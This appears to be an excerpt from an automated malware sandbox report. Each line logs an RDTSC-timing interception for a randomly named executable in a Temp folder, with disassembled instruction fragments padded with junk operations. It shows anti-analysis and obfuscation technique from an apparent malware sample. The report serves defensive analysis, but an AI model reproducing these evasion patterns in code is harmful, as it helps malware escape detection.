                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 473BAC second address: 473BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F4784F102C6h 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 47370E second address: 47371D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 47371D second address: 473732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4784F102CBh 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 473870 second address: 47387E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4751B9 second address: 4751CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F4784F102C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4751CA second address: 4751DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F4785B0BF46h 0x0000000c popad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4751DC second address: 4751E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4751E2 second address: 4751FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4785B0BF53h 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 48BDE0 second address: 48BDF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4784F102CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 48DAB2 second address: 48DADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Ch 0x00000007 pushad 0x00000008 jmp 00007F4785B0BF56h 0x0000000d ja 00007F4785B0BF46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B90C72 second address: 4B90C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B90C76 second address: 4B90C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B60812 second address: 4B60831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4784F102D2h 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B60831 second address: 4B60837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B60837 second address: 4B6083B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0D96 second address: 4BA0DC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f mov di, cx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4785B0BF53h 0x0000001d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0DC1 second address: 4BA0DC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0DC7 second address: 4BA0DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4785B0BF4Ah 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0DEE second address: 4BA0DFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0DFD second address: 4BA0E02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0E02 second address: 4BA0E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4784F102D5h 0x0000000a add esi, 2B10DDF6h 0x00000010 jmp 00007F4784F102D1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F4784F102D3h 0x00000023 movzx eax, di 0x00000026 popad 0x00000027 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B20B0A second address: 4B20B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B20B0E second address: 4B20B14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B20B14 second address: 4B20B40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov dx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F4785B0BF52h 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov edi, 11BDC830h 0x0000001c mov dh, 37h 0x0000001e popad 0x0000001f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B20B40 second address: 4B20BBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e pushad 0x0000000f push ebx 0x00000010 pushfd 0x00000011 jmp 00007F4784F102D0h 0x00000016 sbb eax, 5C422FA8h 0x0000001c jmp 00007F4784F102CBh 0x00000021 popfd 0x00000022 pop ecx 0x00000023 pushfd 0x00000024 jmp 00007F4784F102D9h 0x00000029 sbb cl, FFFFFFC6h 0x0000002c jmp 00007F4784F102D1h 0x00000031 popfd 0x00000032 popad 0x00000033 push dword ptr [ebp+0Ch] 0x00000036 jmp 00007F4784F102CEh 0x0000003b push dword ptr [ebp+08h] 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B20BBE second address: 4B20BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50923 second address: 4B50929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50929 second address: 4B5092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B5092D second address: 4B5096F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a call 00007F4784F102D4h 0x0000000f movzx esi, di 0x00000012 pop ebx 0x00000013 movzx ecx, di 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F4784F102CFh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov cx, 445Dh 0x00000028 popad 0x00000029 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA04BA second address: 4BA04BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA04BE second address: 4BA04C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA04C2 second address: 4BA04C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA04C8 second address: 4BA0515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4784F102D0h 0x0000000f push eax 0x00000010 jmp 00007F4784F102CBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4784F102D5h 0x0000001d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0515 second address: 4BA056E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4785B0BF57h 0x00000009 or si, A15Eh 0x0000000e jmp 00007F4785B0BF59h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ax, 1435h 0x00000020 jmp 00007F4785B0BF52h 0x00000025 popad 0x00000026 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0423 second address: 4BA0433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4784F102CCh 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0433 second address: 4BA0437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0437 second address: 4BA044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4784F102CDh 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B60612 second address: 4B60616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B60616 second address: 4B6061C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0898 second address: 4BA089E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA089E second address: 4BA08A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA08A4 second address: 4BA08A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA08A8 second address: 4BA08C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4784F102D1h 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50889 second address: 4B508DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 09h 0x0000000d pushfd 0x0000000e jmp 00007F4785B0BF51h 0x00000013 and ax, 7716h 0x00000018 jmp 00007F4785B0BF51h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007F4785B0BF4Eh 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B508DD second address: 4B508E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B508E1 second address: 4B508E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B90D4C second address: 4B90D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 call 00007F4784F102D3h 0x0000000a mov ax, 408Fh 0x0000000e pop esi 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4784F102CEh 0x00000018 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B90D7B second address: 4B90D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA072F second address: 4BA0733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0733 second address: 4BA0737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0737 second address: 4BA073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B808DB second address: 4B8091F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F4785B0BF4Dh 0x00000010 mov ebp, esp 0x00000012 jmp 00007F4785B0BF4Eh 0x00000017 mov eax, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4785B0BF57h 0x00000021 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B8091F second address: 4B80937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4784F102D4h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B703B0 second address: 4B703B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B703B4 second address: 4B703D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F4784F102CDh 0x00000012 mov bh, ah 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B703D1 second address: 4B703D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30021 second address: 4B30036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30036 second address: 4B3003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3003C second address: 4B30089 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4784F102D4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 jmp 00007F4784F102CEh 0x00000017 call 00007F4784F102D2h 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 mov edi, 639E68ACh 0x00000028 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30089 second address: 4B3017A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4785B0BF55h 0x00000008 adc cl, FFFFFF86h 0x0000000b jmp 00007F4785B0BF51h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F4785B0BF50h 0x00000019 xor ecx, 01836528h 0x0000001f jmp 00007F4785B0BF4Bh 0x00000024 popfd 0x00000025 popad 0x00000026 and esp, FFFFFFF8h 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F4785B0BF54h 0x00000030 and ecx, 50789788h 0x00000036 jmp 00007F4785B0BF4Bh 0x0000003b popfd 0x0000003c mov dx, si 0x0000003f popad 0x00000040 xchg eax, ecx 0x00000041 pushad 0x00000042 mov di, si 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F4785B0BF4Ah 0x0000004c jmp 00007F4785B0BF55h 0x00000051 popfd 0x00000052 jmp 00007F4785B0BF50h 0x00000057 popad 0x00000058 popad 0x00000059 push eax 0x0000005a jmp 00007F4785B0BF4Bh 0x0000005f xchg eax, ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 call 00007F4785B0BF4Bh 0x00000068 pop esi 0x00000069 jmp 00007F4785B0BF59h 0x0000006e popad 0x0000006f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3017A second address: 4B301F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 39EAF3EEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F4784F102D2h 0x00000011 mov dword ptr [esp], ebx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F4784F102CEh 0x0000001b adc si, E368h 0x00000020 jmp 00007F4784F102CBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F4784F102D8h 0x0000002c adc eax, 52F635C8h 0x00000032 jmp 00007F4784F102CBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov ebx, dword ptr [ebp+10h] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov eax, edx 0x00000041 mov ax, di 0x00000044 popad 0x00000045 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B301F4 second address: 4B30205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 38h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop esi 0x0000000e mov bl, FBh 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30205 second address: 4B3020A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3020A second address: 4B30229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 4118496Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4785B0BF4Eh 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30229 second address: 4B30238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30238 second address: 4B3026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4785B0BF4Fh 0x00000009 add si, CF7Eh 0x0000000e jmp 00007F4785B0BF59h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3026C second address: 4B3027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov di, 818Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3027D second address: 4B30282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30282 second address: 4B302AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F4784F102CDh 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
